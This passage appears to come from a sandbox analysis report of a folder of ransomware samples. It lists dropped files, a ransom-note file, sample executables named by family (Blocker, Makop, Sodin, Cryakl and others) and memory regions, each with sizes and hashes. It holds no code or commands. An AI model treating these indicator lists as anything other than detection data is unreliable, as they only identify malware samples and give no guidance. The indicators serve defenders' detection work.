                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nsu8DA1.tmp\INetC.dll

                                                                                                                                    Filesize

                                                                                                                                    24KB

                                                                                                                                    MD5

                                                                                                                                    640bff73a5f8e37b202d911e4749b2e9

                                                                                                                                    SHA1

                                                                                                                                    9588dd7561ab7de3bca392b084bec91f3521c879

                                                                                                                                    SHA256

                                                                                                                                    c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502

                                                                                                                                    SHA512

                                                                                                                                    39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nsu8DA1.tmp\System.dll

                                                                                                                                    Filesize

                                                                                                                                    16KB

                                                                                                                                    MD5

                                                                                                                                    c8ffec7d9f2410dcbe25fe6744c06aad

                                                                                                                                    SHA1

                                                                                                                                    1d868cd6f06b4946d3f14b043733624ff413486f

                                                                                                                                    SHA256

                                                                                                                                    50138c04dc8b09908d68abc43e6eb3ab81e25cbf4693d893189e51848424449f

                                                                                                                                    SHA512

                                                                                                                                    4944c84894a26fee2dd926bf33fdf4523462a32c430cf1f76a0ce2567a47f985c79a2b97ceed92a04edab7b5678bfc50b4af89e0f2dded3b53b269f89e6b734b

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nsu8DA1.tmp\nsDialogs.dll

                                                                                                                                    Filesize

                                                                                                                                    11KB

                                                                                                                                    MD5

                                                                                                                                    da979fedc022c3d99289f2802ef9fe3b

                                                                                                                                    SHA1

                                                                                                                                    2080ceb9ae2c06ab32332b3e236b0a01616e4bba

                                                                                                                                    SHA256

                                                                                                                                    d6d8f216f081f6c34ec3904ef635d1ed5ca9f5e3ec2e786295d84bc6997ddcaa

                                                                                                                                    SHA512

                                                                                                                                    bd586d8a3b07052e84a4d8201945cf5906ee948a34806713543acd02191b559eb5c7910d0aff3ceab5d3b61bdf8741c749aea49743025dbaed5f4c0849c80be6

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e778a7b0716d179b56333f12543bf8e9a1c95e65f89d3f2314cac0e63ef9761e.exe

                                                                                                                                    Filesize

                                                                                                                                    3.7MB

                                                                                                                                    MD5

                                                                                                                                    d84b93d27697635ab473f1111294193f

                                                                                                                                    SHA1

                                                                                                                                    5896780f0ab43ba114ec9343a5e3bb01717a1f36

                                                                                                                                    SHA256

                                                                                                                                    e778a7b0716d179b56333f12543bf8e9a1c95e65f89d3f2314cac0e63ef9761e

                                                                                                                                    SHA512

                                                                                                                                    5ad570432158e7d43187a3066c1366ca4b98ebfeb2f8c10cf4e625d008a2594e10c876ee00d16130d077d3827e80293e8d211862562ab116a474c86e15cc9434

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5469182495d92a5718e0e1dcdf371e92b79724e427050154f318de693d341c89.exe

                                                                                                                                    Filesize

                                                                                                                                    369KB

                                                                                                                                    MD5

                                                                                                                                    f8e0e87d37574e2bcacb2da34f06861e

                                                                                                                                    SHA1

                                                                                                                                    50d384d0cac7a0e0ad3e0e600e0e22701bda522c

                                                                                                                                    SHA256

                                                                                                                                    5469182495d92a5718e0e1dcdf371e92b79724e427050154f318de693d341c89

                                                                                                                                    SHA512

                                                                                                                                    ce205dc864667e5a8fed7f93ac3fdb0000831675ff8ad2cc90305e69212d342f79f9496d4d4c6b2d252b679c1876d2bad133788c843099c3e14aa1457ee0b02f

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Makop.gen-2f9a41b230e25e27518dfbc53c9ca85320c179e1e6ea2911d3885e143e7e0db8.exe

                                                                                                                                    Filesize

                                                                                                                                    1.8MB

                                                                                                                                    MD5

                                                                                                                                    f71f611c03576a5a6881de8df73ef232

                                                                                                                                    SHA1

                                                                                                                                    9b6c2dc7ef3155109ac30d281fcae0f19eee037a

                                                                                                                                    SHA256

                                                                                                                                    2f9a41b230e25e27518dfbc53c9ca85320c179e1e6ea2911d3885e143e7e0db8

                                                                                                                                    SHA512

                                                                                                                                    3a6be11312e3b4b2d47d4590df0f277bce07ac5c959b6824a22275f1b948c04aba5c23c5bdfd920edc7b5ef863c167aa0f48fdae546e157e959b16575ab1d375

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Zerber.gen-8eabc1aaecbd3a2ea45eba91b72b67c65ba5a407ed5e30ad4a1f9a52d4f155fc.exe

                                                                                                                                    Filesize

                                                                                                                                    70KB

                                                                                                                                    MD5

                                                                                                                                    40efa724149395c6366ae7d8ec9982cb

                                                                                                                                    SHA1

                                                                                                                                    3ea9c486c2bd99d7a000f94fcab9745fdd548460

                                                                                                                                    SHA256

                                                                                                                                    8eabc1aaecbd3a2ea45eba91b72b67c65ba5a407ed5e30ad4a1f9a52d4f155fc

                                                                                                                                    SHA512

                                                                                                                                    0d0639e9a57e4b297c2793de56aec95ada8c6068ec7557ce687581235ea9c9f3079b92e48e5627264736a51bbe849d5802dd43d1e93ff5f8e6a0e595055717ce

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Blocker.gen-3c7c5113e6c4f8f6d5811f866007237b7ad3a28fa6c26eaa26c1ea60db89ae4f.exe

                                                                                                                                    Filesize

                                                                                                                                    1.9MB

                                                                                                                                    MD5

                                                                                                                                    b06a8d5ecfb4c1e4bc1f7f549586aaf8

                                                                                                                                    SHA1

                                                                                                                                    fc01ff911a9c02aa6484242421b0605f94fd61e7

                                                                                                                                    SHA256

                                                                                                                                    3c7c5113e6c4f8f6d5811f866007237b7ad3a28fa6c26eaa26c1ea60db89ae4f

                                                                                                                                    SHA512

                                                                                                                                    b5645eb66614769eb9acbab5430541e32f719301a4407c5f24d1d64ce7bff78ddc83eae270b398bb416f4479aff21800e9ab3c50d469013987f2b0e049afb54b

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Blocker.gen-8dd5a6a62d7621199c9c49b3ba71a249a8b0a5dc47f2704495c4008e679f7f1a.exe

                                                                                                                                    Filesize

                                                                                                                                    6.2MB

                                                                                                                                    MD5

                                                                                                                                    6a9203bb0e6822b3c92fb3ae87f611e8

                                                                                                                                    SHA1

                                                                                                                                    294bcc737ca3eac5ec049f170d679072e34f2e25

                                                                                                                                    SHA256

                                                                                                                                    8dd5a6a62d7621199c9c49b3ba71a249a8b0a5dc47f2704495c4008e679f7f1a

                                                                                                                                    SHA512

                                                                                                                                    045a6f7dcf089ec47f9487eb6a2eb53dfd2dbbe908eb840bba57f35dc67667448ffd025a7e8ba043630bd6749ae3bbd51fdb922fa2a402ced374618844d70ce4

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Encoder.gen-3821124354be3b5845958605bbe35a71a0f67294082d582b7a8db6eb9e4b87b1.exe

                                                                                                                                    Filesize

                                                                                                                                    201KB

                                                                                                                                    MD5

                                                                                                                                    6a084aa91515a4b0ca3d7353e99197fd

                                                                                                                                    SHA1

                                                                                                                                    e17352a0e48f0f321f6c8b3b70bdd68751e949a4

                                                                                                                                    SHA256

                                                                                                                                    3821124354be3b5845958605bbe35a71a0f67294082d582b7a8db6eb9e4b87b1

                                                                                                                                    SHA512

                                                                                                                                    fdcfb55b22e0fb9d81fab60e208dacf34c0d608a04056cde5c495a0a8cfb87fb079e0fe5a84f3432b8b286f00152a1eaac946d0f32d9151ebc5d6b7429dbbaf0

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Generic-1d6f7662f9b034063d694a32d84c538e32da8adb6a52b77eeb3aaec3871b5e47.exe

                                                                                                                                    Filesize

                                                                                                                                    2.8MB

                                                                                                                                    MD5

                                                                                                                                    907de29be6e943391551fccb1f6a20c8

                                                                                                                                    SHA1

                                                                                                                                    b4e595b6f7e9ec29e0ee6811cf03ffd3238d8fbb

                                                                                                                                    SHA256

                                                                                                                                    1d6f7662f9b034063d694a32d84c538e32da8adb6a52b77eeb3aaec3871b5e47

                                                                                                                                    SHA512

                                                                                                                                    3fb7fcc38e724c56b7e9e69a8028f3079ad6d16e67dc91ab9c559519092d734d31b98595c69683c11a48b0159765ae8f3e07e061b81461017acc9e0ce53cae57

                                                                                                                                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Generic-5c93fd17f804ee4268e7712b6f070f55a438547ee3fe10b67870806740d1e304.exe

                                                                                                                                    Filesize

                                                                                                                                    950KB

                                                                                                                                    MD5

                                                                                                                                    7aea6ecd88eadbcac27bee606fb5d2f2

                                                                                                                                    SHA1

                                                                                                                                    63977c00325d54deac21719faa4b91f873a47229

                                                                                                                                    SHA256

                                                                                                                                    5c93fd17f804ee4268e7712b6f070f55a438547ee3fe10b67870806740d1e304

                                                                                                                                    SHA512

                                                                                                                                    c4ae77160b662cbafc10cda2879329bc5714abf61a9cf584f6423f6c46fcb5931faf52ff79dc0cc0ba15d26557f8b98b27dc4f96ad993ef0c344cfdd2b00ca8b

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Setting\TPV.ini

                                                                                                                                    Filesize

                                                                                                                                    97B

                                                                                                                                    MD5

                                                                                                                                    01ec249135a750ddafcbc59efa1907f5

                                                                                                                                    SHA1

                                                                                                                                    8ed90694463670eea29c138968d3f0623c48959f

                                                                                                                                    SHA256

                                                                                                                                    87df5f64707a772fde498c66ae9e19dbeb336d0774be9787697f16a256241e88

                                                                                                                                    SHA512

                                                                                                                                    18e8e6ea97c9a4dd4255e1f94c7257cda70fe26de03f378ecdfe4f45341a36682f2c7ea322e8d44d774a3943f7165a6c1476b1d8aac0ebea66f673e23fdc94fb

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Setting\Ventas.ini

                                                                                                                                    Filesize

                                                                                                                                    364B

                                                                                                                                    MD5

                                                                                                                                    b6be36890ca17aae38cd3185f0788c67

                                                                                                                                    SHA1

                                                                                                                                    f0ced1b52565b6d41c397a2f7420ea01f3f96552

                                                                                                                                    SHA256

                                                                                                                                    9c4d0e10da21befc8dab2761fdc25650346656f8015f92508d41f3bfbfd74954

                                                                                                                                    SHA512

                                                                                                                                    c2eee9120719ce0feaacaf6e42d3f215fa8b3910defa2fb7551bea46dd5b539c77bee87a492059ca5754f3e9b8160da9226e4a3490b73bd2525c96e793003aa3

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Blocker.jzec-53cd863882ac57f52b41ff301b71277c897c61b70209063860d229af27f68518.exe

                                                                                                                                    Filesize

                                                                                                                                    397KB

                                                                                                                                    MD5

                                                                                                                                    ca2be0064b6c09a1f8b98df82eba094f

                                                                                                                                    SHA1

                                                                                                                                    b602a11553c49a7a6bf5f689ab3a6b1b5db83dad

                                                                                                                                    SHA256

                                                                                                                                    53cd863882ac57f52b41ff301b71277c897c61b70209063860d229af27f68518

                                                                                                                                    SHA512

                                                                                                                                    95b7fda149a9cc23af01fa532f869217d7c08da7db73f07b9f59d7c40794a0e1610199fd8e80dc0ba0f70311e0a465d54faf020f97d79e7dd468d1de616ea31f

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Blocker.mnap-40f18fbf099097fcface5cbf159ec9b4c207767e4f58c73b976360c85a7d45e0.exe

                                                                                                                                    Filesize

                                                                                                                                    19.9MB

                                                                                                                                    MD5

                                                                                                                                    9fd31c21e4e370daae3d1d2457494e94

                                                                                                                                    SHA1

                                                                                                                                    573773c188f81ebad222d983f68fe364d8365f7f

                                                                                                                                    SHA256

                                                                                                                                    40f18fbf099097fcface5cbf159ec9b4c207767e4f58c73b976360c85a7d45e0

                                                                                                                                    SHA512

                                                                                                                                    96e420848082f048061ab050197c166ce820287cdaa4f6a287b71363908acb95e91dd84312286d314865305ce452fde83c335b0b7fbb47e52090a18aa89f2c4d

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Cryakl.awf-12efd85d31a02fafe099a1e6d386e7f8f60c98bb07245048bab2b954c38b4939.exe

                                                                                                                                    Filesize

                                                                                                                                    1.5MB

                                                                                                                                    MD5

                                                                                                                                    d67610d901a94ddb2c35dca615540851

                                                                                                                                    SHA1

                                                                                                                                    9f6cb11c71e7114e1bb59e6bb3ec3d969cdfa741

                                                                                                                                    SHA256

                                                                                                                                    12efd85d31a02fafe099a1e6d386e7f8f60c98bb07245048bab2b954c38b4939

                                                                                                                                    SHA512

                                                                                                                                    aa60a32858e008a9e6212e2850431932d03501605f892f1ea153c6df51b1daa5b4dc2330823e8eb844fce9443b22c8a8447402b9e863249036e97783cd6c550d

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gen.aafg-d23b5af1e67735bc73fb117373e9dbc240c5837a20a0e0ccbb8f36fc964eff1c.exe

                                                                                                                                    Filesize

                                                                                                                                    127KB

                                                                                                                                    MD5

                                                                                                                                    5959ffcdd8a0034cd7a470d836906093

                                                                                                                                    SHA1

                                                                                                                                    5bdee1e69eda9446437c66867953dcb7cf164e70

                                                                                                                                    SHA256

                                                                                                                                    d23b5af1e67735bc73fb117373e9dbc240c5837a20a0e0ccbb8f36fc964eff1c

                                                                                                                                    SHA512

                                                                                                                                    33986e81777b4a674b5d1460b2f09146acf0f3dae96f9671c6eaae70a0a967487c935280bab37b3f995e9d1fd911d45f521ac2b57a48922d073dbcc376bfc7aa

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gen.zwm-2bc59c59fb0af3fe338d65723edd92ec2f3137e9b82c029f035d44222e62c586.exe

                                                                                                                                    Filesize

                                                                                                                                    243KB

                                                                                                                                    MD5

                                                                                                                                    f6c17b12d412bbe796ffd9894fe7b9e5

                                                                                                                                    SHA1

                                                                                                                                    03c5de2c1f69d096f39752b1b2317e5adc1fac70

                                                                                                                                    SHA256

                                                                                                                                    2bc59c59fb0af3fe338d65723edd92ec2f3137e9b82c029f035d44222e62c586

                                                                                                                                    SHA512

                                                                                                                                    04fbe8e99c9e62d5a388be5a7f1628f7323266bcbd296bf3b09ad089e755d76c872b77d72817c6811299f332efe4fafc8639d862d4f861abbb523776c448c1c8

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gimemo.bcdt-4bf2e6d05f7148112a112bfb25e214e58bc42cbbeca98b48d8004e11845c44d1.exe

                                                                                                                                    Filesize

                                                                                                                                    1.5MB

                                                                                                                                    MD5

                                                                                                                                    83b731ef12c86d6716f6ece7d3eb3268

                                                                                                                                    SHA1

                                                                                                                                    73c000b3883019d457512c44ac16bf0b863d07fa

                                                                                                                                    SHA256

                                                                                                                                    4bf2e6d05f7148112a112bfb25e214e58bc42cbbeca98b48d8004e11845c44d1

                                                                                                                                    SHA512

                                                                                                                                    4a99d6559f135e2002049a6b9447ed1d08a653f95f754ee006a71bc595f10cbbd776078ed8c439cc21f6b1ca1703919ef1395eca9f17dcb8fd35a59d630959de

                                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gimemo.cdqu-3b376a70e14b683bad581e801c56f0b377cbdcf324e130889bab0d4678682103.exe

                                                                                                                                    Filesize

                                                                                                                                    502KB

                                                                                                                                    MD5

                                                                                                                                    7c4cacc999181922bec126108c147f50

                                                                                                                                    SHA1

                                                                                                                                    a995b845b95e1e4ebcaf562feb0e8bf36bc7c4fc

                                                                                                                                    SHA256

                                                                                                                                    3b376a70e14b683bad581e801c56f0b377cbdcf324e130889bab0d4678682103

                                                                                                                                    SHA512

                                                                                                                                    5d0c9ad177447ab5c09d267b97778739303d0a50976a008e4ba1aa161a514b007a41aa2900fb27169503612eb422243e648b0d9c361b2a00006060df3eaf7222

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\EventCustomIcons.bmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                    MD5

                                                                                                                                    4545b9a0feda544e8104ab5cd5272b70

                                                                                                                                    SHA1

                                                                                                                                    65821e116c65d2aed60190218d85519f339fbe4f

                                                                                                                                    SHA256

                                                                                                                                    a0db87627186d148693a0a741147cac066c077d433e5f548bc29dcf4e85ff731

                                                                                                                                    SHA512

                                                                                                                                    d2a03218065cbaa6395cad3f8d17f0905df3d8fcf947187d485300899c45304a4097c19c5b0b2c1c3df335714cd86b8e31ec67b47bbb32e633a5706f5c7f00f6

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\Exc.bmp

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    cf968757c851f19b58ceb7c656274a8f

                                                                                                                                    SHA1

                                                                                                                                    6667d3927c553a0ab6c5b84fb8e901b49068c62a

                                                                                                                                    SHA256

                                                                                                                                    869d298147721d8b84b025ba8da6200b2bf275ca4bd4406ba5973e489d9f0c84

                                                                                                                                    SHA512

                                                                                                                                    dabf7afb66b88b72fddfe6ec100446357e9e19ed71265c31da9bebcbc62bbfb61f029dbdef618f0fc29b27649ac1f452f4eba584bba5f7d0fe80e29eb409c350

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\Occ.bmp

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    f2c8367d5e9f7ddcee658e11f6b0793e

                                                                                                                                    SHA1

                                                                                                                                    44d0be4cc2d797bdade10fc0689510ede32ce044

                                                                                                                                    SHA256

                                                                                                                                    6e3b1cdb1ad19312993fd5766616f8f5753e39521b3a6d4cfea2c789d9bd6d40

                                                                                                                                    SHA512

                                                                                                                                    5b49e6634acac67d56e41c4dca1924f5d6a7682571a9f3481814b5a719d00dad3ce5ca7b3916293bcdb34107aa85be9b30ee2318b1730248cde6a5be4159045a

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\Reminder.bmp

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    6c53504c5f6132fcceea3c362ed88a2a

                                                                                                                                    SHA1

                                                                                                                                    f803881ce1be3c63f4456f8de197065988123840

                                                                                                                                    SHA256

                                                                                                                                    d1a350c71160483f71bc87a690a3eb0abd91a56fcb8daca44f3e5897ddd99d8e

                                                                                                                                    SHA512

                                                                                                                                    15d3f3a860c7a453fc4df0eaebf0b316ccf24f2c84e8aeca679b1a42f3784360f3cdb4202c6d3c0693894c58ba98dd39896528e856951fcaabf32312ffbc51af

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\private.bmp

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    8db0c73c637bce18833a6a7f96ba7b1c

                                                                                                                                    SHA1

                                                                                                                                    69a57e6da61a87a1dce5f5a952ecd8fff5ea1cac

                                                                                                                                    SHA256

                                                                                                                                    9d013a0b15ca080360939b4965a262fc041c3036b39367ee8bef9125aafd94f3

                                                                                                                                    SHA512

                                                                                                                                    b4a2dee15f152545f8f36eacc0b2c933ff261fffa0776004a784a9194658396d9ee9742c208edb2762bdf22bc2d20c559a01cdecd8bb38f7ad96ed269f13103b

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Icons\read_me_lkdtt.txt

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    10c06898c1a8ee37c2eb262d5c477335

                                                                                                                                    SHA1

                                                                                                                                    363bbdda4afd09205a6434fd690a38b5758ff062

                                                                                                                                    SHA256

                                                                                                                                    97109718795f688bdeaec143eff588df1f053c5f1be69fdfd953c8751132fd3f

                                                                                                                                    SHA512

                                                                                                                                    0efbc79d3b684af74b85744cd390ac1bac2cca018f859447f686c83106590150d11e55f0e1bfba6b7e86b683659c3a0f4da49331dca8a0bf022fd7ed5e942b74

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Styles\Office2007Aqua.dll

                                                                                                                                    Filesize

                                                                                                                                    320KB

                                                                                                                                    MD5

                                                                                                                                    3ec4edaa01293d2a44d9558d84be9693

                                                                                                                                    SHA1

                                                                                                                                    a500e91f1504808cb765cd59e8fcf0c5154cf73b

                                                                                                                                    SHA256

                                                                                                                                    ea42ebeb256873f389ae022c0ef85238533939ea53fe15590d9b569c523a7a23

                                                                                                                                    SHA512

                                                                                                                                    8f576cfcfcc1469b96a4cb58e86e559faa129fe35d02dea54b4389a6ed6216bb32ae21de6ab89a998695055e2d4bd574137f13004d07eff822244e6b1dbc12a7

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Styles\Office2007Black.dll

                                                                                                                                    Filesize

                                                                                                                                    361KB

                                                                                                                                    MD5

                                                                                                                                    933094bfc79f11fa2504fc52f1a5f96f

                                                                                                                                    SHA1

                                                                                                                                    a5898f322cb596cce877d76983c676b71a3cad5a

                                                                                                                                    SHA256

                                                                                                                                    9dfb4eb83963dd2b929e9eba3c390063ba3a009527c3ff2fed4eeff06c68d9cf

                                                                                                                                    SHA512

                                                                                                                                    dc5440a51a76a460cd128cf2143bc9a3a50cd895b9fc4c16fe45df26928c345ed336c760d2ba44ef566d353e50702a0d68cfb59ab8420d674f16b6b51b239bee

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\Styles\Office2007Blue.dll

                                                                                                                                    Filesize

                                                                                                                                    331KB

                                                                                                                                    MD5

                                                                                                                                    0a3daedb09896b155f5807453b8a7cd1

                                                                                                                                    SHA1

                                                                                                                                    240830360b62c014595de637ab2bcfc4619d3f96

                                                                                                                                    SHA256

                                                                                                                                    8c8f7e210b52fd9218417cffbde4a9640346889da0cc252f45d4ec41466ef61e

                                                                                                                                    SHA512

                                                                                                                                    fdbaa6a2d885082b3b2d0ac59564e0550e367a2be78f94e84c8bf33417229310ac3d264af6ab3633174f3c1af78e4780974667c1e768ca3789341e621c4ba708

                                                                                                                                  • C:\Users\Admin\Desktop\00420\calendario\calendario.exe

                                                                                                                                    Filesize

                                                                                                                                    589KB

                                                                                                                                    MD5

                                                                                                                                    639e68afe23fb3d46bcf911d77cb681c

                                                                                                                                    SHA1

                                                                                                                                    ecae982b4baa8b74cef4d849ef6a8398c1ea33c9

                                                                                                                                    SHA256

                                                                                                                                    c3fd1c10c7bb3b3e58cde8363196350c6f4a3b85972bb2e33189df6ae1e79eaa

                                                                                                                                    SHA512

                                                                                                                                    9fbaa25333c23f7bf80717c38cf2790a3c2d2325b1743926cc2fe39ef6adbcbf3ae21bda436177cedc9b46676272aaca9bfabb11d2456b1b2ac3e11e51617b23

                                                                                                                                  • C:\Users\Admin\Documents\reg.exe

                                                                                                                                    Filesize

                                                                                                                                    875KB

                                                                                                                                    MD5

                                                                                                                                    4f0b189e3d6bd2d21a5bba6fbfa6d4fa

                                                                                                                                    SHA1

                                                                                                                                    388c35cc03e39bab63afa5fc848a32bd0bbf6248

                                                                                                                                    SHA256

                                                                                                                                    a4185838cf25a0a5a85cd755e5bffee7701e0b8f37d60e38b93a203c3d57198f

                                                                                                                                    SHA512

                                                                                                                                    e820a1949121355bd2cbb0f1243e88ea4bcb9cbd5f4ca608c81d5911791d0b45fa642975356166244ff920be3444b6a0b7121f05ae91e7bd07519aa846d7362a

                                                                                                                                  • C:\Users\Admin\Documents\s.exe

                                                                                                                                    Filesize

                                                                                                                                    71KB

                                                                                                                                    MD5

                                                                                                                                    03eb4b0b185e6dba196f5449e0c29bbb

                                                                                                                                    SHA1

                                                                                                                                    31aea205b0eaa2603cf6d0d8995098801f34c64e

                                                                                                                                    SHA256

                                                                                                                                    586898c36339b99c8d57879a9e58495b07f2112e1ff8e66db796a8a7f700ecb8

                                                                                                                                    SHA512

                                                                                                                                    1af13b4a82834287876b00b6fc83cfa1a35ff53b37139e3a5dfb5866a53b14a5df8537a65f446fd626a8176fab413073a194a8341f030e85a79f018114d6109a

                                                                                                                                  • C:\Windows\temp\0kbdtgjn.inf

                                                                                                                                    Filesize

                                                                                                                                    583B

                                                                                                                                    MD5

                                                                                                                                    e948c3902774d9e319d8c7b1d39f6787

                                                                                                                                    SHA1

                                                                                                                                    df45988379d86a2b2bb89a66579a8f1ba8cfd785

                                                                                                                                    SHA256

                                                                                                                                    dc9095e565b7604d44735a144704b76e8268cc6932958d6cf17e2e50810eab6e

                                                                                                                                    SHA512

                                                                                                                                    732268eeef2eb19b0336f3820151ff5a6f73ec0c07f0f743a2d03033bd6adf6e182ed552e0c3d9c5bf81d42b95dfe33f779d9fc25085ad9479379b8165c9cfe4

                                                                                                                                  • C:\Windows\temp\35qrww00.exe

                                                                                                                                    Filesize

                                                                                                                                    362KB

                                                                                                                                    MD5

                                                                                                                                    03897668b136ad11fdb37731d9242808

                                                                                                                                    SHA1

                                                                                                                                    e45e551698e4850bd20c3deec9f123f4bfb7538d

                                                                                                                                    SHA256

                                                                                                                                    5248e3b033601fa92d485c456c1e44b99526b4766bd9c27208f7c8eb7cf626d8

                                                                                                                                    SHA512

                                                                                                                                    0dcf66b1f37c6cef3106f529467ec923eca8d81620f2c0f0b67ff4ef2c1ba4705bfd85650ed46d1ad6b01837c552ce167a96c19afb8851633f74939e6eb7afbe

                                                                                                                                  • C:\zvyk.mp3

                                                                                                                                    Filesize

                                                                                                                                    5KB

                                                                                                                                    MD5

                                                                                                                                    74debab0dde0f0b4008a885e8375b8ad

                                                                                                                                    SHA1

                                                                                                                                    c2138bf8bf6bf52e2971401caeb17c659ee71001

                                                                                                                                    SHA256

                                                                                                                                    e89fb871a500ae5f4d078eac3345112b6ebcd8cb74de804c0b0aff83a2ab1617

                                                                                                                                    SHA512

                                                                                                                                    65a1861b1ceb262df1119f9b949f6baac2feecb9f2ff84c0bb0c30395a3813e2e9786b00e6b0a2c6e7f70170b64254c454435b474d7bb91be93fdbd951425480

                                                                                                                                  • \??\c:\users\admin\desktop\00420\heur-trojan-ransom.win32.hellokit.gen-9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0.exe

                                                                                                                                    Filesize

                                                                                                                                    179KB

                                                                                                                                    MD5

                                                                                                                                    06ce6cd8bde756265f95fcf4eecadbe9

                                                                                                                                    SHA1

                                                                                                                                    bacf50b20f1cf2165ac96535aeac36b49c8a8677

                                                                                                                                    SHA256

                                                                                                                                    9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0

                                                                                                                                    SHA512

                                                                                                                                    b13677539da247707e7016c56aaba889826648b3050428974aca6d109d7fa88d7e610a61214ddee06f1fa09c287ade6f71182b999955c6d3674d5701b0f89326

                                                                                                                                  • \??\c:\users\admin\desktop\00420\trojan-ransom.win32.cryptor.ebt-29dc75145a691eeebbafac2f4b1c18aa48d87f78bcf07c4221d8698510799a9e.exe

                                                                                                                                    Filesize

                                                                                                                                    586KB

                                                                                                                                    MD5

                                                                                                                                    bfb0c34567e84d9421a32646fc54bdc3

                                                                                                                                    SHA1

                                                                                                                                    abc981349ae823455a7c07f29238dcc2848d4643

                                                                                                                                    SHA256

                                                                                                                                    29dc75145a691eeebbafac2f4b1c18aa48d87f78bcf07c4221d8698510799a9e

                                                                                                                                    SHA512

                                                                                                                                    26a136c3a1ccf8def0c8b60841f534339b4a49ddf9f8251d504f1481ea665f78e015fe38a4f11a8a33f2facd710dd60a0201641b73bade6b57db30d3c3c4ee1d

                                                                                                                                  • \??\c:\users\admin\desktop\00420\trojan-ransom.win32.polyransom.bvls-e8d497900bb056042fb1516f886717d5895ec8eadafeaf78949a1f46b7ac09f5.exe

                                                                                                                                    Filesize

                                                                                                                                    2.6MB

                                                                                                                                    MD5

                                                                                                                                    eb890fd5655b266e7f918a225318cd41

                                                                                                                                    SHA1

                                                                                                                                    a5e749cf48aade5890be4418093bf2b7a7f5e0c0

                                                                                                                                    SHA256

                                                                                                                                    e8d497900bb056042fb1516f886717d5895ec8eadafeaf78949a1f46b7ac09f5

                                                                                                                                    SHA512

                                                                                                                                    369e7765c2199af1e98abf8f21b6b698f6c55be224151f71d18f88e9541a541b40f3c25a8ae21894dba91abeeadb4e05610aa28933ddb09a29fbe0b5775abbce

                                                                                                                                  • \??\c:\users\admin\desktop\00420\trojan-ransom.win32.sodin.aea-d0e075a9346acbeca7095df2fc5e7c28909961184078e251f737f09b8ef892b6.exe

                                                                                                                                    Filesize

                                                                                                                                    273KB

                                                                                                                                    MD5

                                                                                                                                    f2e9b4bbb5436a87abd020850a0bccd3

                                                                                                                                    SHA1

                                                                                                                                    f1acf90d5a42eba5b601ebe1b954be72d1c5b0b2

                                                                                                                                    SHA256

                                                                                                                                    d0e075a9346acbeca7095df2fc5e7c28909961184078e251f737f09b8ef892b6

                                                                                                                                    SHA512

                                                                                                                                    ffbb167e505ca0c3720c9a0308a7885fd8bf89a0296dedd51906a3f04a341d3cf685646db891effe166a56c713b86497b8324f86061427cffa5375caafd0e46d

                                                                                                                                  • memory/1144-212-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    296KB

                                                                                                                                  • memory/1896-236-0x0000000035000000-0x0000000035099000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    612KB

                                                                                                                                  • memory/2180-129-0x0000000005460000-0x00000000054A8000-memory.dmp

